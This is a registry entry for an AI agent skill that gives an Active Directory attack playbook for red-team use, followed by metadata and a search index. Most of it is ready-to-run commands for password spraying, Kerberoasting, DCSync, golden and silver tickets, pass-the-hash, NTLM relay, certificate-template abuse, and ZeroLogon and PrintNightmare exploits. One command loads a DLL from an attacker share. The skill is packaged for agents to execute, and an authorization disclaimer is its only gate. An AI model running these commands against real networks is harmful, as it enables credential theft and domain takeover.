{"id":"c9d31cfc-0c2a-4793-8e47-bcb142d3a49e","shortId":"NC6G9d","kind":"skill","title":"active-directory-attacks","tagline":"Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.","description":"> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n<!-- security-allowlist: credential-extraction, kerberos-attacks -->\n\n# Active Directory Attacks\n\n## Purpose\n\nProvide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.\n\n## Inputs/Prerequisites\n\n- Kali Linux or Windows attack platform\n- Domain user credentials (for most attacks)\n- Network access to Domain Controller\n- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec\n\n## Outputs/Deliverables\n\n- Domain enumeration data\n- Extracted credentials and hashes\n- Kerberos tickets for impersonation\n- Domain Administrator access\n- Persistent access mechanisms\n\n---\n\n## Essential Tools\n\n| Tool | Purpose |\n|------|---------|\n| BloodHound | AD attack path visualization |\n| Impacket | Python AD attack tools |\n| Mimikatz | Credential extraction |\n| Rubeus | Kerberos attacks |\n| CrackMapExec | Network exploitation |\n| PowerView | AD enumeration |\n| Responder | LLMNR/NBT-NS poisoning |\n\n---\n\n## Core Workflow\n\n### Step 1: Kerberos Clock Sync\n\nKerberos requires clock synchronization (±5 minutes):\n\n```bash\n# Detect clock skew\nnmap -sT 10.10.10.10 -p445 --script smb2-time\n\n# Fix clock on Linux\nsudo date -s \"14 APR 2024 18:25:16\"\n\n# Fix clock on Windows\nnet time /domain /set\n\n# Fake clock without changing system time\nfaketime -f '+8h' <command>\n```\n\n### Step 2: AD Reconnaissance with BloodHound\n\n```bash\n# Start BloodHound\nneo4j console\nbloodhound --no-sandbox\n\n# Collect data with SharpHound\n.\\SharpHound.exe -c All\n.\\SharpHound.exe -c All --ldapusername user --ldappassword pass\n\n# Python collector (from Linux)\nbloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all\n```\n\n### Step 3: PowerView Enumeration\n\n```powershell\n# Get domain info\nGet-NetDomain\nGet-DomainSID\nGet-NetDomainController\n\n# Enumerate users\nGet-NetUser\nGet-NetUser -SamAccountName targetuser\nGet-UserProperty -Properties pwdlastset\n\n# Enumerate groups\nGet-NetGroupMember -GroupName \"Domain Admins\"\nGet-DomainGroup -Identity \"Domain Admins\" | Select-Object -ExpandProperty Member\n\n# Find local admin access\nFind-LocalAdminAccess -Verbose\n\n# User hunting\nInvoke-UserHunter\nInvoke-UserHunter -Stealth\n```\n\n---\n\n## Credential Attacks\n\n### Password Spraying\n\n```bash\n# Using kerbrute\n./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123\n\n# Using CrackMapExec\ncrackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success\n```\n\n### Kerberoasting\n\nExtract service account TGS tickets and crack offline:\n\n```bash\n# Impacket\nGetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt\n\n# Rubeus\n.\\Rubeus.exe kerberoast /outfile:hashes.txt\n\n# CrackMapExec\ncrackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt\n\n# Crack with hashcat\nhashcat -m 13100 hashes.txt rockyou.txt\n```\n\n### AS-REP Roasting\n\nTarget accounts with \"Do not require Kerberos preauthentication\":\n\n```bash\n# Impacket\nGetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat\n\n# Rubeus\n.\\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt\n\n# Crack with hashcat\nhashcat -m 18200 hashes.txt rockyou.txt\n```\n\n### DCSync Attack\n\nExtract credentials directly from DC (requires Replicating Directory Changes rights):\n\n```bash\n# Impacket\nsecretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt\n\n# Mimikatz\nlsadump::dcsync /domain:domain.local /user:krbtgt\nlsadump::dcsync /domain:domain.local /user:Administrator\n```\n\n---\n\n## Kerberos Ticket Attacks\n\n### Pass-the-Ticket (Golden Ticket)\n\nForge TGT with krbtgt hash for any user:\n\n```powershell\n# Get krbtgt hash via DCSync first\n# Mimikatz - Create Golden Ticket\nkerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt\n\n# Impacket\nticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator\nexport KRB5CCNAME=Administrator.ccache\npsexec.py -k -no-pass domain.local/Administrator@dc.domain.local\n```\n\n### Silver Ticket\n\nForge TGS for specific service:\n\n```powershell\n# Mimikatz\nkerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt\n```\n\n### Pass-the-Hash\n\n```bash\n# Impacket\npsexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH\nwmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH\nsmbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH\n\n# CrackMapExec\ncrackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local\ncrackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth\n```\n\n### OverPass-the-Hash\n\nConvert NTLM hash to Kerberos ticket:\n\n```bash\n# Impacket\ngetTGT.py domain.local/user -hashes :NTHASH\nexport KRB5CCNAME=user.ccache\n\n# Rubeus\n.\\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt\n```\n\n---\n\n## NTLM Relay Attacks\n\n### Responder + ntlmrelayx\n\n```bash\n# Start Responder (disable SMB/HTTP for relay)\nresponder -I eth0 -wrf\n\n# Start relay\nntlmrelayx.py -tf targets.txt -smb2support\n\n# LDAP relay for delegation attack\nntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access\n```\n\n### SMB Signing Check\n\n```bash\ncrackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt\n```\n\n---\n\n## Certificate Services Attacks (AD CS)\n\n### ESC1 - Misconfigured Templates\n\n```bash\n# Find vulnerable templates\ncertipy find -u user@domain.local -p password -dc-ip 10.10.10.10\n\n# Exploit ESC1\ncertipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local\n\n# Authenticate with certificate\ncertipy auth -pfx administrator.pfx -dc-ip 10.10.10.10\n```\n\n### ESC8 - Web Enrollment Relay\n\n```bash\nntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController\n```\n\n---\n\n## Critical CVEs\n\n### ZeroLogon (CVE-2020-1472)\n\n```bash\n# Check vulnerability\ncrackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon\n\n# Exploit\npython3 cve-2020-1472-exploit.py DC01 10.10.10.10\n\n# Extract hashes\nsecretsdump.py -just-dc domain.local/DC01\\$@10.10.10.10 -no-pass\n\n# Restore password (important!)\npython3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD\n```\n\n### PrintNightmare (CVE-2021-1675)\n\n```bash\n# Check for vulnerability\nrpcdump.py @10.10.10.10 | grep 'MS-RPRN'\n\n# Exploit (requires hosting malicious DLL)\npython3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\\\attacker\\share\\evil.dll'\n```\n\n### samAccountName Spoofing (CVE-2021-42278/42287)\n\n```bash\n# Automated exploitation\npython3 sam_the_admin.py \"domain.local/user:password\" -dc-ip 10.10.10.10 -shell\n```\n\n---\n\n## Quick Reference\n\n| Attack | Tool | Command |\n|--------|------|---------|\n| Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` |\n| AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` |\n| DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` |\n| Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` |\n| Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` |\n| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |\n\n---\n\n## Constraints\n\n**Must:**\n- Synchronize time with DC before Kerberos attacks\n- Have valid domain credentials for most attacks\n- Document all compromised accounts\n\n**Must Not:**\n- Lock out accounts with excessive password spraying\n- Modify production AD objects without approval\n- Leave Golden Tickets without documentation\n\n**Should:**\n- Run BloodHound for attack path discovery\n- Check for SMB signing before relay attacks\n- Verify patch levels for CVE exploitation\n\n---\n\n## Examples\n\n### Example 1: Domain Compromise via Kerberoasting\n\n```bash\n# 1. Find service accounts with SPNs\nGetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10\n\n# 2. Request TGS tickets\nGetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt\n\n# 3. Crack tickets\nhashcat -m 13100 tgs.txt rockyou.txt\n\n# 4. Use cracked service account\npsexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10\n```\n\n### Example 2: NTLM Relay to LDAP\n\n```bash\n# 1. Start relay targeting LDAP\nntlmrelayx.py -t ldaps://dc.domain.local --delegate-access\n\n# 2. Trigger authentication (e.g., via PrinterBug)\npython3 printerbug.py domain.local/user:pass@target 10.10.10.12\n\n# 3. Use created machine account for RBCD attack\n```\n\n---\n\n## Troubleshooting\n\n| Issue | Solution |\n|-------|----------|\n| Clock skew too great | Sync time with DC or use faketime |\n| Kerberoasting returns empty | No service accounts with SPNs |\n| DCSync access denied | Need Replicating Directory Changes rights |\n| NTLM relay fails | Check SMB signing, try LDAP target |\n| BloodHound empty | Verify collector ran with correct creds |\n\n---\n\n## Additional Resources\n\nFor advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.","tags":["active","directory","attacks","antigravity","awesome","skills","sickn33","agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding"],"capabilities":["skill","source-sickn33","skill-active-directory-attacks","topic-agent-skills","topic-agentic-skills","topic-ai-agent-skills","topic-ai-agents","topic-ai-coding","topic-ai-workflows","topic-antigravity","topic-antigravity-skills","topic-claude-code","topic-claude-code-skills","topic-codex-cli","topic-codex-skills"],"categories":["antigravity-awesome-skills"],"synonyms":[],"warnings":[],"endpointUrl":"https://skills.sh/sickn33/antigravity-awesome-skills/active-directory-attacks","protocol":"skill","transport":"skills-sh","auth":{"type":"none","details":{"cli":"npx skills add sickn33/antigravity-awesome-skills","source_repo":"https://github.com/sickn33/antigravity-awesome-skills","install_from":"skills.sh"}},"qualityScore":"0.700","qualityRationale":"deterministic score 0.70 from registry signals: · indexed on github topic:agent-skills · 34997 github stars · SKILL.md body (9,437 chars)","verified":false,"liveness":"unknown","lastLivenessCheck":null,"agentReviews":{"count":0,"score_avg":null,"cost_usd_avg":null,"success_rate":null,"latency_p50_ms":null,"narrative_summary":null,"summary_updated_at":null},"enrichmentModel":"deterministic:skill-github:v1","enrichmentVersion":1,"enrichedAt":"2026-04-25T06:50:21.943Z","embedding":null,"createdAt":"2026-04-18T21:30:18.855Z","updatedAt":"2026-04-25T06:50:21.943Z","lastSeenAt":"2026-04-25T06:50:21.943Z","tsv":"'+8':209 '-1':509,527,562 '-1472':767 '-1675':813 '-2020':766 '-2021':812,840 '-21':511,529,564 '-42278':841 '-5':510,528,563 '/24':691 '/42287':842 '/admin:password@10.10.10.10':454 '/administrator@10.10.10.10':583,589,595 '/administrator@dc.domain.local':544 '/certsrv/certfnsh.asp':757 '/dc01':791 '/dc01@dc01':803 '/domain':199,463,469,505,558 '/format':425 '/id':515 '/kerbrute':332 '/krbtgt':513,899 '/lowpriv:password':986,998 '/outfile':378,427 '/ptt':517,573,646 '/rc4':570,644 '/service':568 '/set':200 '/sid':507,560 '/svc_admin:crackedpassword@10.10.10.10':1022 '/target':566 '/user':465,471,503,556,633,642,897 '/user:pass@10.10.10.10':833 '/user:pass@target':1051 '/user:password':367,850 '1':158,971,977,1030 '10.10.10.0':690 '10.10.10.10':174,254,337,344,371,383,419,601,610,718,747,773,782,792,807,819,854,990,1002 '10.10.10.12':1052 '13100':395,1011 '14':187 '16':192 '18':190 '18200':434 '2':212,991,1024,1041 '2024':189 '25':191 '3':258,1006,1053 '4':1014 '5':166 '500':516 'abus':1117 'access':98,122,124,311,683,1040,1084 'account':356,403,928,933,980,1018,1057,1080 'action':1145 'activ':2,11,51,61 'active-directory-attack':1 'ad':131,137,150,213,700,940,1128 'adc':759,1122 'addit':1108 'admin':296,302,310,898 'administr':121,472,504,533,557,603,612 'administrator.ccache':536 'administrator.pfx':743 'administrator@domain.local':736 'advanc':1111 'applic':1139 'approv':943 'apr':188 'as-rep':398,867 'asktgt':641 'asreproast':424 'assess':44 'attack':4,9,19,53,59,69,89,96,132,138,145,326,438,475,649,673,679,699,834,858,917,924,953,962,1060,1115,1119 'attacker-wpad':678 'auth':617,741 'authent':737,1043 'author':34,42 'autom':844 'bash':168,217,329,362,410,449,578,628,652,687,705,752,768,814,843,976,1029 'bloodhound':105,130,216,219,222,245,951,1100 'bloodhound-python':244 'c':231,234,255 'ca':727,729 'ca-nam':728 'ca.domain.local':756 'ca.domain.local/certsrv/certfnsh.asp':755 'certif':697,739 'certipi':709,721,740 'chang':204,447,1089 'check':686,769,815,956,1094 'cif':569 'clock':160,164,170,181,194,202,1064 'collect':226 'collector':241,1103 'command':860 'comprehens':6,56 'compromis':927,973 'consol':221 'constraint':909 'continu':350 'continue-on-success':349 'control':48,101 'convert':622 'core':155 'correct':1106 'cover':14,64 'crack':360,390,429,1007,1016 'crackmapexec':107,146,341,342,380,381,598,599,608,688,771 'creat':498,1055 'cred':1107 'credenti':16,66,93,113,141,325,440,921 'critic':762 'cs':701 'cve':765,811,839,967 'cve-2020-1472-exploit.py':780 'cve-2021-1675.py':830 'cves':763 'd':251,334,606,905 'data':111,227 'date':185 'dc':336,369,417,443,457,716,745,788,852,881,914,988,1000,1071 'dc-ip':368,416,715,744,851,987,999 'dc.domain.local':676,732,1037 'dc01':781 'dcsync':437,462,468,495,876,1083 'defens':45 'deleg':672,682,1039,1114 'delegate-access':681,1038 'deni':1085 'deploy':1121 'describ':1146 'detect':169 'direct':441 'directori':3,12,52,62,446,1088 'disabl':655 'discoveri':955 'dll':828 'document':925,948 'domain':25,75,91,100,109,120,263,295,301,524,531,873,906,920,972 'domain-sid':523 'domain.local':252,335,366,413,453,464,470,506,532,543,559,582,588,594,607,632,790,802,832,849,985,997,1021,1050 'domain.local/admin:password@10.10.10.10':452 'domain.local/administrator@10.10.10.10':581,587,593 'domain.local/administrator@dc.domain.local':542 'domain.local/dc01':789 'domain.local/dc01@dc01':801 'domain.local/lowpriv:password':984,996 'domain.local/svc_admin:crackedpassword@10.10.10.10':1020 'domain.local/user':631 'domain.local/user:pass@10.10.10.10':831 'domain.local/user:pass@target':1049 'domain.local/user:password':365,848 'domain/admin':879 'domain/user':864,888 'domaincontrol':761 'domaingroup':299 'domainsid':270 'domin':26,76 'e.g':1044 'educ':49 'empti':1077,1101 'enrol':750 'enumer':110,151,260,274,289 'environ':13,50,63 'esc1':702,720 'esc8':748 'escal':23,73 'essenti':126 'eth0':661 'evil.dll':836 'exampl':969,970,1023 'excess':935 'execut':1141 'expandproperti':306 'exploit':148,719,778,824,845,968,1123 'export':534,636 'extract':112,142,354,439,783 'f':208 'fail':1093 'fake':201 'faketim':207,1074 'find':308,313,706,710,978 'find-localadminaccess':312 'first':496 'fix':180,193 'forg':482,547 'format':420 'gen':693 'gen-relay-list':692 'get':262,266,269,272,277,280,285,292,298,491 'get-domaingroup':297 'get-domainsid':268 'get-netdomain':265 'get-netdomaincontrol':271 'get-netgroupmemb':291 'get-netus':276,279 'get-userproperti':284 'getnpusers.py':412,872 'gettgt.py':630 'getuserspns.py':364,863,983,995 'golden':480,499,502,555,892,896,945 'gpo':1116 'great':1067 'grep':820 'group':290 'groupnam':294 'h':210,604,613 'harvest':17,67 'hash':115,486,493,514,522,572,577,584,590,596,621,624,634,784,885,890,891,900 'hashcat':392,393,421,426,431,432,1009 'hashes.txt':374,379,396,428,435 'hexpass':808 'hexpassword':809 'host':826 'hunt':317 'ident':300 'impacket':103,135,363,411,450,518,579,629,862,871 'imperson':119 'import':798 'includ':1113 'info':264 'inputs/prerequisites':84 'integr':1129 'invok':319,322 'invoke-userhunt':318,321 'ip':370,418,717,746,806,853,989,1001 'issu':1062 'just-dc':786 'just-dc-us':455 'k':538 'kali':85 'kerbero':18,68,116,144,159,162,408,473,501,554,626,895,916 'kerberoast':353,377,388,861,975,1075 'kerbrut':331,902,903 'krb5ccname':535,637 'krbtgt':459,466,485,492,521 'later':20,70 'ldap':382,669,1028,1034,1098 'ldappassword':238 'ldapusernam':236 'leav':944 'level':965 'linux':86,183,243,1127 'list':695 'llmnr/nbt-ns':153 'local':309,616 'local-auth':615 'localadminaccess':314 'lock':931 'lsadump':461,467 'm':394,433,776,1010 'machin':1056 'malici':827 'mechan':125 'member':307 'microsoft':10,60 'mimikatz':104,140,460,497,553,894 'minut':167 'misconfigur':703 'modifi':938 'movement':21,71 'ms':822 'ms-rprn':821 'must':910,929 'name':730 'need':1086 'neo4j':220 'net':197 'netdomain':267 'netdomaincontrol':273 'netgroupmemb':293 'netus':278,281 'network':97,147 'nmap':172 'no-pass':539,793 'no-sandbox':223 'ns':253 'nthash':520,585,591,597,605,614,635,645 'ntlm':623,647,1025,1091 'ntlmrelayx':651 'ntlmrelayx.py':665,674,753,1035 'object':305,941 'offlin':361 'oper':30,80 'output.txt':389 'outputfil':373,1004 'outputs/deliverables':108 'overpass':619 'overpass-the-hash':618 'overview':1149 'p':249,347,386,713,725,775 'p445':175 'pass':239,477,541,575,795,865,880,883,908 'pass-the-hash':574,882 'pass-the-ticket':476 'password':250,327,387,714,726,797,936 'password123':339,348 'passwordspray':333,904 'patch':964 'path':133,954 'penetr':32,82 'persist':123 'pfx':742 'platform':90 'poison':154 'powershel':261,490,552 'powerview':149,259 'preauthent':409 'printerbug':1046 'printerbug.py':1048 'printnightmar':810 'privileg':22,72 'product':939 'properti':287 'provid':5,55 'psexec':886 'psexec.py':537,580,887,1019 'purpos':54,129 'pwdlastset':288 'python':136,240,246 'python3':779,799,829,846,1047 'quick':856 'ran':1104 'rbcd':1059 'reconnaiss':15,65,214 'red':28,78 'refer':857 'references/advanced-attacks.md':1131,1132 'relationship':1125 'relay':648,658,664,670,694,751,961,1026,1032,1092 'rep':400,869 'replic':445,1087 'req':722 'request':372,866,992,1003 'requir':163,407,444,825 'resourc':1109 'respond':152,650,654,659 'restor':796 'restorepassword.py':800 'return':1076 'right':448,1090 'roast':401,870 'rockyou.txt':397,436,1013 'rodc':1118 'rpcdump.py':818 'rprn':823 'rubeus':106,143,375,422,639 'rubeus.exe':376,423,640 'run':950 'sam_the_admin.py':847 'samaccountnam':282,837 'sandbox':225 'sccm/wsus':1120 'script':176 'secretsdump':877 'secretsdump.py':451,785,878 'secur':43 'see':1130 'select':304 'select-object':303 'server.domain.local':567 'servic':355,551,571,698,979,1017,1079 'share':835 'sharphound':229 'sharphound.exe':230,233 'shell':855 'sid':525 'sign':685,959,1096 'silver':545 'skew':171,1065 'skill':39,1137 'skill-active-directory-attacks' 'smb':343,600,609,684,689,772,958,1095 'smb/http':656 'smb2':178 'smb2-time':177 'smb2support':668,758 'smbexec.py':592 'solut':1063 'source-sickn33' 'specif':550 'spns':982,1082 'spoof':838 'spray':328,901,937 'st':173 'start':218,653,663,1031 'stealth':324 'step':157,211,257 'success':352 'sudo':184 'sync':161,1068 'synchron':165,911 'system':205 'target':402,731,805,889,1033,1099 'target-ip':804 'targets.txt':667,696 'targetus':283 'team':29,79 'techniqu':7,57,1112 'templat':704,708,733,760 'test':33,83 'tf':666 'tgs':357,548,993 'tgs.txt':1005,1012 'tgt':483 'ticket':117,358,474,479,481,500,546,627,893,946,994,1008 'ticketer.py':519 'time':179,198,206,912,1069 'tool':102,127,128,139,859 'topic-agent-skills' 'topic-agentic-skills' 'topic-ai-agent-skills' 'topic-ai-agents' 'topic-ai-coding' 'topic-ai-workflows' 'topic-antigravity' 'topic-antigravity-skills' 'topic-claude-code' 'topic-claude-code-skills' 'topic-codex-cli' 'topic-codex-skills' 'tri':1097 'trigger':1042 'troubleshoot':1061 'trust':1124 'u':247,345,384,602,611,711,723,774 'upn':735 'use':35,37,330,340,1015,1054,1073,1135 'user':92,237,248,275,316,385,458,489,643 'user.ccache':638 'user@domain.local':712,724 'userhunt':320,323 'userproperti':286 'users.txt':338,346,415,875,907 'usersfil':414,874 'valid':46,919 'verbos':315 'verifi':963,1102 'via':494,974,1045 'visual':134 'vulner':707,770,817 'vulntempl':734 'web':749 'wh':677 'window':88,196 'without':203,942,947 'wmiexec.py':586 'workflow':156,1143 'wpad':680 'wrf':662 'xxx':512,530,565 'zerologon':764,777","prices":[{"id":"9e349316-cc40-4ad2-8788-fb247edc47f7","listingId":"c9d31cfc-0c2a-4793-8e47-bcb142d3a49e","amountUsd":"0","unit":"free","nativeCurrency":null,"nativeAmount":null,"chain":null,"payTo":null,"paymentMethod":"skill-free","isPrimary":true,"details":{"org":"sickn33","category":"antigravity-awesome-skills","install_from":"skills.sh"},"createdAt":"2026-04-18T21:30:18.855Z"}],"sources":[{"listingId":"c9d31cfc-0c2a-4793-8e47-bcb142d3a49e","source":"github","sourceId":"sickn33/antigravity-awesome-skills/active-directory-attacks","sourceUrl":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/active-directory-attacks","isPrimary":false,"firstSeenAt":"2026-04-18T21:30:18.855Z","lastSeenAt":"2026-04-25T06:50:21.943Z"}],"details":{"listingId":"c9d31cfc-0c2a-4793-8e47-bcb142d3a49e","quickStartSnippet":null,"exampleRequest":null,"exampleResponse":null,"schema":null,"openapiUrl":null,"agentsTxtUrl":null,"citations":[],"useCases":[],"bestFor":[],"notFor":[],"kindDetails":{"org":"sickn33","slug":"active-directory-attacks","github":{"repo":"sickn33/antigravity-awesome-skills","stars":34997,"topics":["agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding","ai-workflows","antigravity","antigravity-skills","claude-code","claude-code-skills","codex-cli","codex-skills","cursor","cursor-skills","developer-tools","gemini-cli","gemini-skills","kiro","mcp","skill-library"],"license":"mit","html_url":"https://github.com/sickn33/antigravity-awesome-skills","pushed_at":"2026-04-25T06:33:17Z","description":"Installable GitHub library of 1,400+ agentic skills for Claude Code, Cursor, Codex CLI, Gemini CLI, Antigravity, and more. Includes installer CLI, bundles, workflows, and official/community skill collections.","skill_md_sha":"8f4b6c57fed76a76d423744c82ecedc6cf02128c","skill_md_path":"skills/active-directory-attacks/SKILL.md","default_branch":"main","skill_tree_url":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/active-directory-attacks"},"layout":"multi","source":"github","category":"antigravity-awesome-skills","frontmatter":{"name":"active-directory-attacks","description":"Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing."},"skills_sh_url":"https://skills.sh/sickn33/antigravity-awesome-skills/active-directory-attacks"},"updatedAt":"2026-04-25T06:50:21.943Z"}}